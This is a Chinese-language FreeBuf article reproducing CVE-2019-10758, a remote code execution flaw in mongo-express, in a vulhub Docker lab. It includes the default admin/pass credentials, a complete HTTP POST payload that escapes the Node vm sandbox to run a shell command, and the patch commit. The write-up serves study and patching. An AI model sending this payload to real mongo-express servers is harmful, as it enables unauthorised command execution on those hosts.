freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

MongoDB mongo-express远程代码执行(CVE-2019-10758)
2020-08-03 14:55:38

漏洞简介:

此软件包的受影响版本容易受到使用toBSON方法的端点通过远程执行代码(RCE)攻击的攻击。 在非安全环境中滥用vm依赖关系来执行exec命令。 默认用户名是admin,密码是pass。

威胁类型

远程代码执行

威胁等级

漏洞编号

CVE-2019-10758

受影响系统及应用版本

mongo-express,版本0.54.0及更低版本

不受影响的版本

mongo-express 0.54.0或更高版本。

漏洞复现:

这个漏洞环境感觉vulhub的就可以满足,所以选择搭建vulhub的环境

vulhub下载

 git clone https://github.com.cnpmjs.org/vulhub/vulhub

这里还有个小福利,有没有觉得经常git clone的时候特别慢?几K、十几K的下载?

为了解决这个问题,尝试了好多方法,总结了一个最有效的方法

git clone的时候在把https://github.com换成: https://github.com.cnpmjs.org/

这是一个国内的github镜像站,下载速度..怎么说呢,起飞!

安装docker(我之前安装过)

安装docker-compose

pip install docker-compose

启用docker,拉取镜像,启动环境

PS:这就又要说一个福利了,docker pull的时候有没有感觉很慢?放着阿里这么大的靠山得用起来呀

 https://cr.console.aliyun.com/#/accelerator

登录阿里云进去,左下角有个docker镜像加速,按步骤来,然后...起飞!!

(都是一个坑一个坑摸出来的...)

至此环境搭建成功!

环境启动后,访问http://192.168.192.128:8081即可查看到Web页面。

攻击复现:

直接发送如下数据包,即可执行代码

POST /checkValid HTTP/1.1

Host: your-ip

Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Authorization: Basic YWRtaW46cGFzcw==

Content-Type: application/x-www-form-urlencoded

Content-Length: 124

 

document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("touch /tmp/success")

Poc目标:在/tcp下创建success文件

发送数据包后访问   http://localhost:8081

查看是否创建成功:

docker-compose exec web ls /tmp

成功创建uccess文件,都到这一步了,还能做什么自由发挥~

ps:此文章仅用于交流学习~

2、修复建议

https://github.com/mongo-express/mongo-express/commit/d8c9bda46a204ecba1d35558452685cd0674e6f2

 在0.54.0中将bson.js中的vm依赖删除,改用mongo-query-parser

# 安全漏洞 # 漏洞利用 # 漏洞复现 # cve-2019-10758
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者